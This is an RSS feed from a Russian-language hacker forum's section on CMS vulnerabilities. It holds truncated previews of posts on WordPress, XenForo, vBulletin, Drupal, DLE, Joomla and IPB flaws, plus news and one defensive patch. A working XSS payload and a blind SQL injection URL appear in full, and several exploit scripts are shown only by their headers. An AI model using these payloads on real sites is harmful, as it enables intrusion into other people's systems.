<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/">
  <channel>
    <title>Уязвимости популярных CMS</title>
    <description>Уязвимости популярных движков: IPB, Vbulletin, DLE, Oscommerce, WordPress, Joomla и др.</description>
    <pubDate>Fri, 25 Sep 2026 23:42:49 +0000</pubDate>
    <lastBuildDate>Fri, 25 Sep 2026 23:42:49 +0000</lastBuildDate>
    <generator>Хакерский форум: свобода информации, безопасность</generator>
    <link>https://xaker.name/forum/uyazvimosti-cms/</link>
    <atom:link rel="self" type="application/rss+xml" href="https://xaker.name/forum/uyazvimosti-cms/index.rss"/>
    <item>
      <title>Обнаружена критическая уязвимость в WordPress 4.7.0 и 4.7.1</title>
      <pubDate>Fri, 10 Feb 2017 13:16:04 +0000</pubDate>
      <link>https://xaker.name/threads/31492/</link>
      <guid>https://xaker.name/threads/31492/</guid>
      <author>invalid@example.com (admin)</author>
      <dc:creator>admin</dc:creator>
      <content:encoded><![CDATA[Срочно обновите свой WordPress до версии 4.7.2, в более старых версиях найдена критическая уязвимость, через которую уже были атакованы более 100000 сайтов.<br />


	<a href="https://www.xaker.name/attachments/1442/" target="_blank">Посмотреть вложение 1442</a>
	
<br />
<br />
26 января 2017 авторы одной из самых востребованных на сегодняшний день бесплатных систем управления сайтом <strong>WordPress</strong> представили очередную версию 4.7.2. В релизе уточнялось, что в ней были устранены имевшие место в предыдущих проблемы с безопасностью, подробности которых не раскрывались....<br />
<br />
<a href="https://xaker.name/threads/31492/" target="_blank" class="externalLink" rel="nofollow">Обнаружена критическая уязвимость в WordPress 4.7.0 и 4.7.1</a>]]></content:encoded>
    </item>
    <item>
      <title>Xss в Xenforo</title>
      <pubDate>Sat, 28 May 2016 18:24:50 +0000</pubDate>
      <link>https://xaker.name/threads/29341/</link>
      <guid>https://xaker.name/threads/29341/</guid>
      <author>invalid@example.com (Хулиган)</author>
      <dc:creator>Хулиган</dc:creator>
      <content:encoded><![CDATA[Суть:<br />
хреньфоро пихает в description все что есть в 1 посте<br />
пользуясь этим <br />
<br />
создаем топик - в тело куда нибудь или под спойлер пихаем<br />
<br />
[noparse]

<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre> '&gt;&lt;''&gt;&quot;&gt;&lt;script&gt;alert(/hooligan/)&lt;/script&gt; \&quot;&gt; </pre>
</div>[/noparse]<br />
профит<br />
<img src="https://xaker.name/data/rehost/3884908-23687.png" class="bbCodeImage LbImage" alt="[&#x200B;IMG]" data-url="https://xaker.name/data/rehost/3884908-23687.png" />]]></content:encoded>
      <slash:comments>3</slash:comments>
    </item>
    <item>
      <title>Обнаружена вредоносная кампания против WordPress и Joomla</title>
      <pubDate>Sat, 07 May 2016 06:06:17 +0000</pubDate>
      <link>https://xaker.name/threads/31280/</link>
      <guid>https://xaker.name/threads/31280/</guid>
      <author>invalid@example.com (Vialaia)</author>
      <dc:creator>Vialaia</dc:creator>
      <content:encoded><![CDATA[<div style="text-align: center"><img src="https://xaker.name/data/rehost/virus-24170.png" class="bbCodeImage LbImage" alt="[&#x200B;IMG]" data-url="https://xaker.name/data/rehost/virus-24170.png" />&#8203;</div>Обнаружена активная вредоносная кампания, направленная против сайтов на базе WordPress и Joomla. Злоумышленниками взламываются ресурсы, которые работают на базе популярных CMS, через многочисленные уязвимости в распространенных плагинах или эксплуатируют баги в самих CMS, играя на том, что программное обеспечение  редко обновляется своевременно. Также специалисты пишут, что порой атакующие используют легитимные...<br />
<br />
<a href="https://xaker.name/threads/31280/" target="_blank" class="externalLink" rel="nofollow">Обнаружена вредоносная кампания против WordPress и Joomla</a>]]></content:encoded>
    </item>
    <item>
      <title>Socialengine 4.8.9 - sql injection</title>
      <pubDate>Sat, 09 Apr 2016 22:23:36 +0000</pubDate>
      <link>https://xaker.name/threads/31178/</link>
      <guid>https://xaker.name/threads/31178/</guid>
      <author>invalid@example.com (v1nest)</author>
      <dc:creator>v1nest</dc:creator>
      <content:encoded><![CDATA[High-Tech Bridge Research Lab Security обнаружили sql-инъекцию в SocialEngine 4.8.9<br />
SQL-инъекция происходит из-за недостаточной фильтрации входных данных, передаваемых через &quot;OrderBy&quot; HTTP GET параметра на &quot;/index.php&quot; .<br />


<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>
http://[host]/blogs/?category=0&amp;end_date=&amp;orderby=1%20AND%20%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,99,0%29%29%29%29MTeU%29
</pre>
</div>]]></content:encoded>
    </item>
    <item>
      <title>[lfi] wordpress advanced video plugin 1.0</title>
      <pubDate>Sat, 09 Apr 2016 22:16:58 +0000</pubDate>
      <link>https://xaker.name/threads/31177/</link>
      <guid>https://xaker.name/threads/31177/</guid>
      <author>invalid@example.com (v1nest)</author>
      <dc:creator>v1nest</dc:creator>
      <content:encoded><![CDATA[<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>
#!/usr/bin/env python

# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation
# Google Dork: N/A
# Date: 04/01/2016
# Exploit Author: evait security GmbH
# Vendor Homepage: arshmultani - http://dscom.it/
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/
# Version: 1.0
# Tested on: Linux Apache / Wordpress 4.2.2

#  Timeline
#  03/24/2016 - Bug discovered
#  03/24/2016 - Initial notification of vendor
#...</pre>
</div><a href="https://xaker.name/threads/31177/" target="_blank" class="externalLink" rel="nofollow">[lfi] wordpress advanced video plugin 1.0</a>]]></content:encoded>
    </item>
    <item>
      <title>Wordpress plugin wp easy poll 1.1.3 - xss and csrf</title>
      <pubDate>Sat, 09 Jan 2016 19:08:57 +0000</pubDate>
      <link>https://xaker.name/threads/30858/</link>
      <guid>https://xaker.name/threads/30858/</guid>
      <author>invalid@example.com (Хулиган)</author>
      <dc:creator>Хулиган</dc:creator>
      <content:encoded><![CDATA[<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>Exploit Title: WP Easy Poll 1.1.3 XSS and CSRF
Exploit Author : Ahn Sung Jun
Date : 2015-12-09
Vendor Homepage : https://wordpress.org/plugins/wp-easy-poll-afo/
Software Link : https://downloads.wordpress.org/plugin/wp-easy-poll-afo.1.1.3.zip
Version : 1.1.3
Tested On : kail linux Iceweasel

===========================================
Vulnerable Code : wp_easy_poll.php
if(isset($_REQUEST['action']) and $_REQUEST['action'] == 'p_add'){
global $wpdb;
$pc = new poll_class;

/* Line 859 */...</pre>
</div><a href="https://xaker.name/threads/30858/" target="_blank" class="externalLink" rel="nofollow">Wordpress plugin wp easy poll 1.1.3 - xss and csrf</a>]]></content:encoded>
      <slash:comments>1</slash:comments>
    </item>
    <item>
      <title>Обновление безопасности для xenforo</title>
      <pubDate>Sat, 09 Jan 2016 19:06:05 +0000</pubDate>
      <link>https://xaker.name/threads/30876/</link>
      <guid>https://xaker.name/threads/30876/</guid>
      <author>invalid@example.com (admin)</author>
      <dc:creator>admin</dc:creator>
      <content:encoded><![CDATA[Пришла рассылка от форума  <b>xenforo.info</b>:<br />



<div class="bbCodeBlock bbCodeQuote">
	<aside>
		
		<blockquote class="quoteContainer"><div class="quote">Здравствуйте.<br />
Сегодня вышло важное обновление безопасности для XenForo<br />
Настоятельно рекомендуем Вам обновиться.<br />
Спасибо.</div><div class="quoteExpand">Нажмите, чтобы раскрыть...</div></blockquote>
	</aside>
</div>И ссылки на нулл версию. От официалов никаких предупреждений небыло о новых уязвимостях.<br />
Банальный развод на мой взгляд, будьте бдительны.]]></content:encoded>
      <slash:comments>3</slash:comments>
    </item>
    <item>
      <title>Уязвимости wordpress 2015</title>
      <pubDate>Sat, 12 Dec 2015 08:08:28 +0000</pubDate>
      <link>https://xaker.name/threads/30859/</link>
      <guid>https://xaker.name/threads/30859/</guid>
      <author>invalid@example.com (Хулиган)</author>
      <dc:creator>Хулиган</dc:creator>
      <content:encoded><![CDATA[Возможность получить данные с конфига, эксплоит для проверки/эксплуатации уязвимости:<br />
<br />
<b>Wordpress plugin sell download v1.0.16 - local file disclosure.</b><br />


<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>###########################################
#-----------------------------------------#
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
#-----------------------------------------#
# *----------------------------* #
# K |....##...##..####...####....| . #
# h |....#...#........#..#...#...| A #
# a |....#..#.........#..#....#..| N #
# l...</pre>
</div><a href="https://xaker.name/threads/30859/" target="_blank" class="externalLink" rel="nofollow">Уязвимости wordpress 2015</a>]]></content:encoded>
    </item>
    <item>
      <title>Уязвимости vbulletin 5.x</title>
      <pubDate>Tue, 08 Dec 2015 14:08:24 +0000</pubDate>
      <link>https://xaker.name/threads/30849/</link>
      <guid>https://xaker.name/threads/30849/</guid>
      <author>invalid@example.com (Хулиган)</author>
      <dc:creator>Хулиган</dc:creator>
      <content:encoded><![CDATA[Один из вариантов эксплоита для 5 версии vBulletin<br />
<br />
<b>Exploitfixes vbulletin 5.x - remote code execution exploit.</b><br />


<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>#[+] Title: Vbulletin 5.x - Remote Code Execution Exploit
#[+] Product: vbulletin
#[+] Vendor: http://vbulletin.com
#[+] Vulnerable Version(s): Vbulletin 5.x
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
#...</pre>
</div><a href="https://xaker.name/threads/30849/" target="_blank" class="externalLink" rel="nofollow">Уязвимости vbulletin 5.x</a>]]></content:encoded>
    </item>
    <item>
      <title>Уязвимости vbulletin</title>
      <pubDate>Mon, 23 Mar 2015 12:50:02 +0000</pubDate>
      <link>https://xaker.name/threads/246/</link>
      <guid>https://xaker.name/threads/246/</guid>
      <author>invalid@example.com (rijy)</author>
      <dc:creator>rijy</dc:creator>
      <content:encoded><![CDATA[<b><span style="color: black">Рассмотрим уязвимости трёх веток воблы: 2.*.*, 3.0.* и 3.1.*.</span></b><br />
 <br />
 <br />
<b><span style="color: red">Узнаём версию форума.</span></b><br />
В папке /clientscript/ находятся несколко js и css файлов в которых можно посмотреть точную версию форума.<br />
 <br />


<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>vbulletin_ajax_threadslist.js
vbulletin_ajax_namesugg.js
vbulletin_attachment.js
vbulletin_cpcolorpicker.js
vbulletin_editor.js</pre>
</div>Пример:...<br />
<br />
<a href="https://xaker.name/threads/246/" target="_blank" class="externalLink" rel="nofollow">Уязвимости vbulletin</a>]]></content:encoded>
      <slash:comments>53</slash:comments>
    </item>
    <item>
      <title>Drupal Core &lt;= 7.32 - SQL Injection (PHP)</title>
      <pubDate>Mon, 27 Oct 2014 06:41:18 +0000</pubDate>
      <link>https://xaker.name/threads/29899/</link>
      <guid>https://xaker.name/threads/29899/</guid>
      <author>invalid@example.com (Хулиган)</author>
      <dc:creator>Хулиган</dc:creator>
      <content:encoded><![CDATA[<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>&lt;?php
#-----------------------------------------------------------------------------#
# Exploit Title: Drupal core 7.x - SQL Injection                              #
# Date: Oct 16 2014                                                           #
# Exploit Author: Dustin Dörr                                                 #
# Software Link: http://www.drupal.com/                                       #
# Version: Drupal core 7.x versions prior to 7.32...</pre>
</div><a href="https://xaker.name/threads/29899/" target="_blank" class="externalLink" rel="nofollow">Drupal Core &lt;= 7.32 - SQL Injection (PHP)</a>]]></content:encoded>
    </item>
    <item>
      <title>DataLife Engine 9.7 (preview.php) PHP Code Injection Vulnerability  Read more: http:/</title>
      <pubDate>Mon, 26 Aug 2013 10:58:22 +0000</pubDate>
      <link>https://xaker.name/threads/27815/</link>
      <guid>https://xaker.name/threads/27815/</guid>
      <author>invalid@example.com (Хулиган)</author>
      <dc:creator>Хулиган</dc:creator>
      <content:encoded><![CDATA[<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>------------------------------------------------------------------
DataLife Engine 9.7 (preview.php) PHP Code Injection Vulnerability
------------------------------------------------------------------
 
[-] Software Link:
 
http://dleviet.com/
 
 
[-] Affected Version:
 
9.7 only.
 
 
[-] Vulnerability Description:
 
The vulnerable code is located in the /engine/preview.php script:
 
246.    $c_list = implode (',', $_REQUEST['catlist']);
247.
248.    if( strpos(...</pre>
</div><a href="https://xaker.name/threads/27815/" target="_blank" class="externalLink" rel="nofollow">DataLife Engine 9.7 (preview.php) PHP Code Injection Vulnerability  Read more: http:/</a>]]></content:encoded>
      <slash:comments>1</slash:comments>
    </item>
    <item>
      <title>Уязвимости WordPress</title>
      <pubDate>Thu, 31 Jan 2013 13:30:01 +0000</pubDate>
      <link>https://xaker.name/threads/19291/</link>
      <guid>https://xaker.name/threads/19291/</guid>
      <author>invalid@example.com (onthar)</author>
      <dc:creator>onthar</dc:creator>
      <content:encoded><![CDATA[Свежая уязвимость в Wordpress которая позволяет провести DOS атаку на блог жертвы используя файл wp-trackback.php<br />
<br />
Для исправления этой уязвимости необходимо добавить следующий код в файл functions.php, который находится в папке шаблона блога:<br />


<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>function ft_stop_trackback_dos_attacks(){
 global $pagenow;
 if ( 'wp-trackback.php' == $pagenow ){
 // DoS attack fix.
 if ( isset($_POST['charset']) ){
 $charset = $_POST['charset'];
 if ( strlen($charset) &gt; 50 ) { die; }
 }
 }
}...</pre>
</div><a href="https://xaker.name/threads/19291/" target="_blank" class="externalLink" rel="nofollow">Уязвимости WordPress</a>]]></content:encoded>
      <slash:comments>34</slash:comments>
    </item>
    <item>
      <title>Уязвимости Joomla &amp;&amp; Mambo</title>
      <pubDate>Tue, 22 Jan 2013 15:35:46 +0000</pubDate>
      <link>https://xaker.name/threads/19290/</link>
      <guid>https://xaker.name/threads/19290/</guid>
      <author>invalid@example.com (NetSky)</author>
      <dc:creator>NetSky</dc:creator>
      <content:encoded><![CDATA[<b>03 ноября, 2008</b><br />
<br />
<b>Программа:</b> Flash Tree Gallery (компонент к Joomla) 1.0, возможно другие версии.<br />
<br />
<b>Опасность:</b> Высокая<br />
<br />
<b>Наличие эксплоита:</b> Да<br />
<br />
<b>Описание:</b><br />
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.<br />
<br />
Уязвимость существует из-за недостаточной обработки входных данных в параметре &quot;mosConfig_live_site&quot; в сценарии administrator/components/com_treeg/admin.treeg.php. Удаленный пользователь может с...<br />
<br />
<a href="https://xaker.name/threads/19290/" target="_blank" class="externalLink" rel="nofollow">Уязвимости Joomla &amp;&amp; Mambo</a>]]></content:encoded>
      <slash:comments>32</slash:comments>
    </item>
    <item>
      <title>Уязвимости IPB (Invision Power Board)</title>
      <pubDate>Sat, 10 Nov 2012 22:06:41 +0000</pubDate>
      <link>https://xaker.name/threads/27444/</link>
      <guid>https://xaker.name/threads/27444/</guid>
      <author>invalid@example.com (Хулиган)</author>
      <dc:creator>Хулиган</dc:creator>
      <content:encoded><![CDATA[<b><div style="text-align: center">Invision Power Board &lt;= 3.3.4 unserialize Regex Bypass&#8203;</div></b><br />
<br />


<div class="bbCodeBlock bbCodeCode">
	<div class="type">Код:</div>
	<pre>&lt;?php
/*
 
So this is the patch that sanitizes,
static public function safeUnserialize( $serialized )
    {
        // unserialize will return false for object declared with small cap o
        // as well as if there is any ws between O and :
        if ( is_string( $serialized ) &amp;&amp; strpos( $serialized, &quot;\0&quot; ) === false )
        {
            if ( strpos( $serialized, 'O:' ) === false )...</pre>
</div><a href="https://xaker.name/threads/27444/" target="_blank" class="externalLink" rel="nofollow">Уязвимости IPB (Invision Power Board)</a>]]></content:encoded>
    </item>
  </channel>
</rss>
